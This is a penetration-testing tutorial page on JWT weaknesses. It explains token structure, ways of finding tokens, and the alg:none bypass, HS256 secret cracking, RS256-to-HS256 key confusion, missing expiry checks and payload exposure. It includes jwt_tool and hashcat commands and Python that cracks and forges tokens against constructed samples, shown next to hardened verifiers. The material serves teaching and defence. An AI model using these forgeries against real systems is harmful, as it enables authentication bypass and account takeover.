# JWT Vulnerabilities

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚
{% endtab %}
{% endtabs %}

## What is JWT?

JWT (JSON Web Token) is an open standard (RFC 7519) for passing claims between parties as a compact, URL-safe string. In its usual signed form (JWS, RFC 7515) the token is integrity-protected but not encrypted: anyone who holds it can read the contents. It consists of three base64url-encoded parts separated by dots:

* **Header** – Specifies the token type and the signing algorithm (e.g., `HS256`, `RS256`). The sender controls this field, so a verifier must never let it choose the verification routine.
* **Payload** – Contains the claims, such as the subject (`sub`), roles, and expiration time (`exp`).
* **Signature** – An HMAC or digital signature over `base64url(header) + "." + base64url(payload)`; it lets the verifier detect tampering with either part.

A typical JWT looks like this:

```
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvbiBEb2UiLCJhZG1pbiI6dHJ1ZX0.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
```
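To make the relationship between the three segments concrete, here is an added example (not code from the original page) that builds and verifies an HS256 token with nothing but the Python standard library. The secret and the claims are made up; the header and payload encodings it produces are the ones you see in the token above.

```python
import base64
import hashlib
import hmac
import json

# Added example, not from the original page: build and verify an HS256 JWT with
# only the standard library. The secret and the claims below are made up.


def b64url_encode(raw):
    """Base64url without '=' padding, as RFC 7515 requires for JWS segments."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(segment):
    """Restore the padding the token stripped, then decode."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def encode_segment(obj):
    # Compact separators: header and payload are signed as encoded bytes, so the
    # exact JSON serialisation matters.
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode("utf-8"))


def make_hs256_token(payload, secret):
    """Return header.payload.signature for the given claims and shared secret."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = encode_segment(header) + "." + encode_segment(payload)
    # The MAC covers the two encoded segments joined by a dot, nothing else.
    sig = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def verify_hs256_token(token, secret):
    """Return the claims if the MAC is valid, otherwise None.

    The algorithm is fixed to HS256 on the server side: the header's "alg" is
    only checked for equality, never used to pick the verification routine.
    """
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
        provided = b64url_decode(sig_b64)
    except (ValueError, UnicodeDecodeError):
        return None
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret, (header_b64 + "." + payload_b64).encode("ascii"),
                        hashlib.sha256).digest()
    # Constant-time compare: a plain == would leak how many bytes matched.
    if not hmac.compare_digest(expected, provided):
        return None
    return json.loads(b64url_decode(payload_b64))


def split_token(token):
    """Decode header and payload WITHOUT verifying: anyone holding the token can."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    return (json.loads(b64url_decode(header_b64)),
            json.loads(b64url_decode(payload_b64)),
            sig_b64)


if __name__ == "__main__":
    secret = b"your-256-bit-secret"                     # made up
    claims = {"sub": "1234567890", "name": "John Doe", "admin": True}
    token = make_hs256_token(claims, secret)
    print(token)
    print(split_token(token))
    print(verify_hs256_token(token, secret))
    print(verify_hs256_token(token, b"wrong-secret"))   # None
```

Note that `split_token` needs no secret at all: the payload is readable by anyone, which is the point of the "Sensitive Data Exposure" technique later on this page.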

JWTs are widely used in APIs, Single Sign-On (SSO), and authentication mechanisms, but their security largely depends on correct implementation.

<figure><img src="https://1165982130-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F2Et8P5OeWSCJodZ98ujw%2Fuploads%2Fsp6cxGaHKU5c7KmAczqi%2Fimage.png?alt=media&#x26;token=749967b8-8588-427a-b813-ded63bc86ff5" alt=""><figcaption></figcaption></figure>

***

## Find JWT tokens

#### 1. **Inspect HTTP Headers**

JWTs are often passed in HTTP headers, particularly in the `Authorization` header:

```
Authorization: Bearer <your_jwt_token>
```

Use tools like Burp Suite, Postman, or your browser’s Developer Tools to inspect network requests and locate JWTs.

#### 2. **Check Local Storage, Session Storage, and Cookies**

JWTs may be stored client-side in `localStorage`, `sessionStorage`, or cookies. From the browser console:

```
console.log(localStorage.getItem('token'));
console.log(sessionStorage.getItem('token'));
console.log(document.cookie);
```

The key name varies (`token`, `jwt`, `access_token`, `id_token`, ...), so look through all stored keys rather than guessing one. `document.cookie` does not show cookies flagged `HttpOnly`; use the Developer Tools (`F12` -> `Application` -> `Storage`) to see those.

#### 3. **Search in JavaScript Files**

Developers sometimes hardcode JWTs in JavaScript files or templates. `eyJ` is the base64url encoding of `{"`, so it is the start of every JWT whose header is a JSON object; grep for it in a local copy of the site or in files you have pulled down:

```
grep -r 'eyJ' /var/www/html/
```

Expect false positives (any base64 blob of JSON starts the same way) and confirm a hit by decoding its first segment. Burp Suite's passive scanner also flags tokens in responses.

#### 4. **Analyze API Responses**

JWTs are usually issued in the response to a login request (in the JSON body or a `Set-Cookie` header) and may be refreshed in later responses. With `curl`, pass `-i` so response headers are shown alongside the body:

```
curl -i -X GET https://example.com/api -H "Authorization: Bearer <token>"
```

Intercept API responses with Burp Suite or OWASP ZAP to extract JWTs.

#### 5. **Check Logs and Error Messages**

JWTs may be leaked in logs or error messages. Run:

```
grep -r 'Authorization: Bearer' /var/log/
```

Review logs, especially if debugging mode is enabled.
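Grepping for `eyJ` finds candidates; the following added example (not code from the original page) goes one step further and keeps only the matches whose first segment really decodes to a JOSE header, then decodes the claims for triage. It runs over a few constructed lines (a proxy log entry, a JS bundle line, a URL) that include a decoy starting with `eyJ`; the tokens in them are made up.

```python
import base64
import json
import re

# Added example, not from the original page: find JWT-looking strings in any
# text you have collected (JS bundles, HAR exports, log files) and keep only
# the ones whose first segment decodes to a JOSE header. The sample lines and
# the tokens in them are constructed for this example.

# "eyJ" is base64url for '{"', so every JWT with a JSON-object header starts
# with it. Header and payload need some length; the signature may be empty
# (alg "none" tokens end with a bare dot).
JWT_RE = re.compile(r"eyJ[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]*")


def b64url_decode(segment):
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def find_jwts(text):
    """Return one dict per plausible JWT: the token, its alg and its claims."""
    found = []
    for match in JWT_RE.finditer(text):
        token = match.group(0)
        header_b64, payload_b64, _ = token.split(".")
        try:
            header = json.loads(b64url_decode(header_b64))
            claims = json.loads(b64url_decode(payload_b64))
        except (ValueError, UnicodeDecodeError):
            continue            # matched the shape, but is not a JWT
        if not isinstance(header, dict) or "alg" not in header:
            continue
        found.append({"token": token, "alg": header["alg"], "claims": claims})
    return found


# Constructed sample: a proxy log line, a JS bundle line with an unsigned
# ("alg":"none") token, and a URL carrying a decoy that starts with "eyJ" but
# whose first segment decodes to '{"shell script', which is not JSON.
SAMPLE_TEXT = """
GET /api/me HTTP/1.1
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
const debugToken = "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.";
https://example.com/reset?token=eyJzaGVsbCBzY3JpcHQ.eyJub3Qgc2lnbmVkIGhlcmU.abc&lang=en
"""

if __name__ == "__main__":
    for hit in find_jwts(SAMPLE_TEXT):
        print(hit["alg"], hit["claims"])
```

Run it over `strings` output of a JS bundle or a Burp/HAR export; the `alg` column alone is worth a look, since an `alg: none` token lying around in a bundle tells you the backend once accepted one.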

#### 6. **Use Search Engines (Google Dorking)**

Sometimes JWTs are exposed online. Try:

```
site:example.com inurl:token
```

***

## Quick win

Run [**jwt\_tool**](https://github.com/ticarpi/jwt_tool) in its `All Tests` mode (`-M at`) against an authenticated request and look for green lines:

```bash
python3 jwt_tool.py -M at \
    -t "https://api.example.com/api/v1/user/76bab5dd-9307-ab04-8123-fda81234245" \
    -rh "Authorization: Bearer eyJhbG...<JWT Token>"
```

If you are lucky the tool will find some case where the web application is incorrectly checking the JWT:

![](https://book.hacktricks.wiki/en/images/image%20\(935\).png)

Then you can search for the request in your proxy, or dump the JWT that jwt_tool used for that request by querying its log with the ID it printed:

```bash
python3 jwt_tool.py -Q "jwttool_706649b802c9f5e41052062a3787b291"
```

You can also use the [**Burp Extension SignSaboteur**](https://github.com/d0ge/sign-saboteur) to launch JWT attacks from Burp.

***

## Common JWT Vulnerabilities and Exploitation Techniques

### 1. **`alg: none` Signature Bypass**

The `none` algorithm means "unsecured JWT": there is no signature at all. If the server lets the token's own header pick the algorithm and its library still supports `none`, an attacker can set `"alg": "none"`, drop the signature, and the server accepts whatever claims the attacker wrote.

**Exploitation:**

1. Capture a valid JWT token.
2. Modify the header to:

   ```
   { "alg": "none", "typ": "JWT" }
   ```
3. Edit the payload as desired, then remove the signature but keep the trailing dot: `<header>.<payload>.` (an empty third segment).
4. If the server accepts the unsigned token, authentication is bypassed. If plain `none` is rejected, also try case variants such as `None`, `NONE`, and `nOnE`, which get past blocklists that compare the string exactly while the underlying library matches it case-insensitively.

***

### 2. **Weak Secret Key (Brute-Force HS256 Secret Key)**

HS256 signs with a shared secret. If that secret is a dictionary word or a short string, it can be recovered offline from a single captured token: each guess is checked by recomputing the HMAC locally, so the server sees nothing. Tools such as `jwt_tool`, `jwt-cracker`, `hashcat`, and `John the Ripper` automate this.

**Exploitation:**

1. Extract the JWT token and save it to a file (`token.jwt`).
2. Run a dictionary attack with `jwt_tool` or `hashcat` (mode 16500 is JWT; `-a 0` is dictionary mode, while `-a 3` would be a mask brute-force and takes no wordlist):

   ```
   hashcat -m 16500 -a 0 token.jwt rockyou.txt
   ```
3. If cracked, forge valid JWT tokens with arbitrary claims (for example `"admin": true`) and sign them with the recovered secret.
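The whole attack fits in a few lines of Python; the following added example (not code from the original page, and much slower than hashcat) does the dictionary run and then re-signs the token with the recovered secret. The captured token, its deliberately weak secret (`secret123`) and the wordlist are all constructed inside the block.

```python
import base64
import hashlib
import hmac
import json

# Added example, not from the original page: offline dictionary attack on an
# HS256 token, then re-signing with the recovered secret. The target token, its
# weak secret and the wordlist are constructed here; nothing touches a server.


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(segment):
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _sign(header_b64, payload_b64, secret):
    """HS256 MAC over the encoded header and payload, as base64url."""
    signing_input = (header_b64 + "." + payload_b64).encode("ascii")
    return b64url_encode(hmac.new(secret.encode("utf-8"), signing_input, hashlib.sha256).digest())


def claims_of(token):
    """Decode the payload without verification (used for display and checks)."""
    return json.loads(b64url_decode(token.split(".")[1]))


def crack_hs256(token, candidates):
    """Return the first candidate that reproduces the token's MAC, else None."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    if json.loads(b64url_decode(header_b64)).get("alg") != "HS256":
        raise ValueError("dictionary attack only applies to HS256 tokens")
    for secret in candidates:
        # One HMAC per guess; hashcat mode 16500 does exactly this on the GPU.
        if _sign(header_b64, payload_b64, secret) == sig_b64:
            return secret
    return None


def forge_hs256(token, new_claims, secret):
    """Keep the header, merge attacker-chosen claims, sign with the recovered secret."""
    header_b64, payload_b64, _ = token.split(".")
    claims = json.loads(b64url_decode(payload_b64))
    claims.update(new_claims)
    payload_b64 = b64url_encode(json.dumps(claims, separators=(",", ":")).encode("utf-8"))
    return header_b64 + "." + payload_b64 + "." + _sign(header_b64, payload_b64, secret)


def make_sample_token(secret):
    """Constructed stand-in for a token captured from the proxy."""
    header_b64 = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9"      # {"alg":"HS256","typ":"JWT"}
    payload_b64 = b64url_encode(b'{"sub":"alice","admin":false}')
    return header_b64 + "." + payload_b64 + "." + _sign(header_b64, payload_b64, secret)


# Made-up wordlist; in practice this is rockyou.txt or a list of leaked secrets.
WORDLIST = ["password", "123456", "changeme", "secret123", "letmein"]

if __name__ == "__main__":
    captured = make_sample_token("secret123")          # weak secret, constructed
    secret = crack_hs256(captured, WORDLIST)
    print("recovered secret:", secret)
    if secret:
        forged = forge_hs256(captured, {"admin": True}, secret)
        print(forged)
        print(claims_of(forged))
```

The comparison in `crack_hs256` is a plain `==` on purpose: this is the attacker's side, and timing does not matter offline. On the server side the equivalent check must use `hmac.compare_digest`.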

***

### 3. **Key Confusion: RS256 to HS256 Downgrade Attack**

With RS256 the server verifies with an RSA public key; with HS256 it verifies with a shared secret. If the server reads the algorithm from the token header and hands the same key object to whichever routine is named, an attacker can switch the header to `HS256` and HMAC the token with the public key, which the server then uses as the HMAC secret.

**Exploitation:**

1. Obtain the application's public key: a JWKS endpoint such as `/.well-known/jwks.json`, a `jku`/`x5c` reference in the token header, the TLS certificate, or derivation from two tokens signed with the same RSA key.
2. Change the algorithm in the JWT header from `RS256` to `HS256`.
3. Compute HMAC-SHA256 over `<header>.<payload>` using the public key's exact bytes as the secret. The bytes must match what the server loads (PEM vs. DER, with or without a trailing newline), so try more than one encoding.
4. If accepted, the attacker can generate valid admin JWTs. Libraries that require an explicit allow-list of algorithms and refuse HMAC with asymmetric key material are not affected.
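Techniques 1 and 3 share a root cause: the verifier lets the token's header choose the algorithm. The added example below (not code from the original page) puts a verifier with that flaw next to one that pins the algorithm from server configuration, and forges both an `alg: none` token and an HS256 token keyed with the server's public key. `PUBLIC_KEY_PEM` is a placeholder string rather than a real key, and RSA verification is not implemented because neither attack ever reaches it.

```python
import base64
import hashlib
import hmac
import json

# Added example, not from the original page: a verifier that lets the token's
# header choose the algorithm, beside one that pins it. The same flaw enables
# both attacks described above: "alg":"none" (no signature at all) and the
# RS256 -> HS256 downgrade, where the server's RSA public key bytes get used
# as an HMAC secret. PUBLIC_KEY_PEM is a placeholder string, not a real key,
# and RSA verification is not implemented: the attacks never reach that branch.

PUBLIC_KEY_PEM = (b"-----BEGIN PUBLIC KEY-----\n"
                  b"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA...placeholder...\n"
                  b"-----END PUBLIC KEY-----\n")


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(segment):
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def encode_segment(obj):
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode("utf-8"))


def hs256_mac(key, header_b64, payload_b64):
    return hmac.new(key, (header_b64 + "." + payload_b64).encode("ascii"), hashlib.sha256).digest()


def forge(claims, alg, key=None):
    """Attacker side: build a token for the chosen alg without any private key."""
    header_b64, payload_b64 = encode_segment({"alg": alg, "typ": "JWT"}), encode_segment(claims)
    if alg.lower() == "none":
        return header_b64 + "." + payload_b64 + "."     # empty signature segment
    # HS256 keyed with whatever bytes the caller passes, e.g. the public key PEM
    return header_b64 + "." + payload_b64 + "." + b64url_encode(hs256_mac(key, header_b64, payload_b64))


def verify_trusting_header(token, key):
    """VULNERABLE: dispatches on header.alg and feeds the same `key` to any routine."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    alg = json.loads(b64url_decode(header_b64)).get("alg", "")
    if alg.lower() == "none":                          # case-insensitive, like some libraries
        return json.loads(b64url_decode(payload_b64))  # nothing checked at all
    if alg == "HS256":
        if hmac.compare_digest(hs256_mac(key, header_b64, payload_b64), b64url_decode(sig_b64)):
            return json.loads(b64url_decode(payload_b64))
        return None
    if alg == "RS256":
        # A real server would RSA-verify here with `key` as the public key;
        # both attacks succeed without this branch ever running.
        raise NotImplementedError("RSA verification is outside this example")
    return None


def verify_pinned(token, expected_alg, key):
    """HARDENED: the algorithm comes from server config, never from the token."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    if json.loads(b64url_decode(header_b64)).get("alg") != expected_alg:
        return None                                    # rejected before any crypto
    if expected_alg == "HS256":
        if hmac.compare_digest(hs256_mac(key, header_b64, payload_b64), b64url_decode(sig_b64)):
            return json.loads(b64url_decode(payload_b64))
        return None
    raise NotImplementedError("only HS256 is implemented in this example")


if __name__ == "__main__":
    evil = {"sub": "alice", "admin": True}
    for tok in (forge(evil, "none"), forge(evil, "nOnE"), forge(evil, "HS256", PUBLIC_KEY_PEM)):
        print(tok)
        print("  header-trusting verifier:", verify_trusting_header(tok, PUBLIC_KEY_PEM))
        print("  pinned RS256 verifier:   ", verify_pinned(tok, "RS256", PUBLIC_KEY_PEM))
```

The fix is the first line of `verify_pinned`: compare the header's `alg` against the configured one and stop if it differs. Everything else (key type, signature routine) then follows from server configuration, not from attacker input.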

***

### 4. **Missing Expiration Checks and Replay**

A JWT stays valid until its `exp` claim passes, and there is no built-in revocation. If the server does not check `exp` (or the token has none), a stolen token works indefinitely, so an attacker who cannot forge signatures can still replay a captured token long after it should have died.

**Exploitation:**

1. Capture a valid JWT.
2. Wait until the `exp` time has passed (or find a token that is already expired) and replay it against the API.
3. If the request succeeds, expiration is not enforced. Also test a token with the `exp` claim removed.
4. Changing `exp` in the payload invalidates the signature, so extending a token's lifetime only works when you can re-sign it, for example with a secret recovered in technique 2 or through the `alg: none` bypass.

***

### 5. **Sensitive Data Exposure in JWT Payloads**

JWT payloads are base64url-encoded, not encrypted. Anyone who sees the token (browser storage, logs, proxies, third-party scripts) can read every claim, so storing secrets or personal data in them leaks it.

**Exploitation:**

1. Decode the JWT payload. The segment uses the URL-safe alphabet (`-` and `_`) and carries no padding, so translate it before `base64 -d` and append `=` until the length is a multiple of four if the decoder complains:

   ```
   echo '<JWT_PAYLOAD>' | tr '_-' '/+' | base64 -d
   ```
2. If sensitive information (passwords, API keys, internal identifiers, e-mail addresses) is exposed, attackers can use it for further attacks.
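Techniques 4 and 5 are two sides of the same token: what an attacker can read without any key, and what the server must check before trusting it. The added example below (not code from the original page) decodes a token without verifying it, flags claim names that look like credentials, and implements the `exp`/`nbf` check a server should run, rejecting malformed values instead of ignoring them. The token, its claims and the key-name patterns are constructed for the example.

```python
import base64
import json
import re
import time

# Added example, not from the original page: read a token without verifying it
# (anyone holding it can do this) and run the two checks the previous two
# sections call for: are the time claims enforced, and does the payload carry
# data it should not. The token, its claims and the key-name patterns are made up.

SENSITIVE_KEY_RE = re.compile(r"pass(word|wd)?|secret|api[_-]?key|private|ssn|card|cvv", re.I)


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(segment):
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_unverified(token):
    """Header and claims only; the signature is deliberately ignored."""
    header_b64, payload_b64, _ = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def find_sensitive_claims(claims):
    """Dotted paths of claim names that look like credentials or PII, nested included."""
    hits = []

    def walk(node, path):
        if isinstance(node, dict):
            for key, value in node.items():
                full = path + "." + key if path else key
                if SENSITIVE_KEY_RE.search(key):
                    hits.append(full)
                walk(value, full)
        elif isinstance(node, list):
            for i, value in enumerate(node):
                walk(value, path + "[" + str(i) + "]")

    walk(claims, "")
    return hits


def _numeric_date(value):
    # RFC 7519 NumericDate: seconds since the epoch. bool is an int subclass
    # in Python, so it has to be excluded explicitly.
    return isinstance(value, (int, float)) and not isinstance(value, bool)


def check_time_claims(claims, now=None, leeway=60, require_exp=True):
    """Server-side check. Returns rejection reasons; an empty list means accept.

    Malformed values are rejected, not coerced: a library that silently skips a
    string "exp" is exactly the missing-expiration bug described above.
    """
    now = time.time() if now is None else now
    reasons = []
    exp = claims.get("exp")
    if exp is None:
        if require_exp:
            reasons.append("missing exp")
    elif not _numeric_date(exp):
        reasons.append("exp is not a NumericDate")
    elif now > exp + leeway:
        reasons.append("expired")
    nbf = claims.get("nbf")
    if nbf is not None:
        if not _numeric_date(nbf):
            reasons.append("nbf is not a NumericDate")
        elif now + leeway < nbf:
            reasons.append("not yet valid")
    return reasons


# Constructed token: real-looking header and claims, garbage signature.
SAMPLE_CLAIMS = {
    "sub": "1234567890", "name": "John Doe", "admin": False,
    "password": "hunter2",
    "profile": {"email": "john@example.com", "api_key": "sk_live_placeholder"},
    "exp": 1600000000,
}
SAMPLE_TOKEN = ".".join([
    b64url_encode(b'{"alg":"HS256","typ":"JWT"}'),
    b64url_encode(json.dumps(SAMPLE_CLAIMS, separators=(",", ":")).encode("utf-8")),
    "not-a-real-signature",
])

if __name__ == "__main__":
    header, claims = decode_unverified(SAMPLE_TOKEN)
    print(header)
    print("leaked claims:", find_sensitive_claims(claims))
    print("server would reject because:", check_time_claims(claims, now=1700000000))
```

The `leeway` parameter exists because clocks drift; keep it to seconds, not minutes, and treat `require_exp=False` as a conscious decision per token type rather than the default.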

***

## Tools for Penetration Testing JWTs

### **1. jwt\_tool**

* A powerful Python tool for testing JWT security (claim tampering, signature checks, `alg: none`, key confusion, secret cracking).
* Install it from the repository:

  ```
  git clone https://github.com/ticarpi/jwt_tool
  cd jwt_tool && python3 -m pip install -r requirements.txt
  ```
* Example usage (dictionary attack on an HS256 secret):

  ```
  python3 jwt_tool.py <token> -C -d wordlist.txt
  ```

### **2. jwt-cracker**

* Used for brute-forcing weak JWT secrets.
* Command:

  ```
  jwt-cracker -t <token>
  ```

### **3. Burp Suite with JWT Editor**

* Intercept and modify JWTs in real time.
* Add `JWT Editor` extension from Burp’s BApp Store.

### **4. John the Ripper & Hashcat**

* Used for cracking JWT HMAC secrets offline (HS256/HS384/HS512).
* Hashcat example (mode 16500 is JWT, `-a 0` is dictionary mode; the token goes in a file, not on the command line):

  ```
  hashcat -m 16500 -a 0 token.jwt rockyou.txt
  ```

***

{% hint style="success" %}
Learn & practice [**For the OSCP.**](https://shop.verylazytech.com)

{% endhint %}
